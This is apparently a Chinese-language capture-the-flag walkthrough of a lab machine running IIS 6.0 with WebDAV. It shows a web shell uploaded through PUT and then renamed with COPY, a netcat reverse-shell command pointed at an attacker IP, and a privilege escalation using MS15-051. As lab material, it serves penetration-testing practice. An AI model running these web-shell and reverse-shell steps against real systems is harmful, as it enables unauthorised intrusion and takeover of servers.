概述 (Overview)
Author: 0x584A
攻击链 (Kiillchain)
TTPs (Tactics, Techniques & Procedures)
- nmapAutomator.sh
- httpie
- https://github.com/danielmiessler/SecLists/blob/master/Web-Shells/laudanum-0.8/aspx/shell.aspx
- https://github.com/SecWiki/windows-kernel-exploits
阶段1:枚举
通过nmap扫描,脚本识别提示存在很多类型的 methods。Web服务中间件是 iis 6.0
浏览器访问显示为一个默认的提示信息页面,没多大利用的可能性。
看一眼 AutoRecon 的提示信息,WebDAV is enabled
阶段2:工具及利用
阶段2.1:PUT文件上传
尝试利用 PUT
请求上传内容,发现txt是成功的但是不能直接上传asp、aspx脚本类文件。
查下是否存在可利用的 exploit:
有一个 41738.py 的脚本,从代码的描述中查看它是用来弹计算器的… 放弃..
阶段2.2:COPY脚本文件
找到微软的开发文档,在 WebDAV Methods
中找可利用的类型,发现很多可以用于本次攻击(我这里用的COPY)。
先将 shell.aspx
的内容上传成功txt的文本文件,然后通过 copy
动作将服务器上的shell.txt,复制成shell.aspx的新文件。
王德发?为毛会失败?
有仔细看了下手册,艹,写反了…
这里提示404是因为shell脚本里验证了来源IP,将我们的IP在脚本里加上再上传即可。
阶段2.3:NC反连上线
上传 netcat 反弹一个会话shell至kali。
先搜一下 netcat 的绝对路径。
反连:c:\Inetpub\wwwroot\nc.exe 10.10.16.4 9900 -e cmd
阶段3:权限提升
我这里用的 msf 的 local_exploit_suggester module
,最终用 MS15-051 成功提权。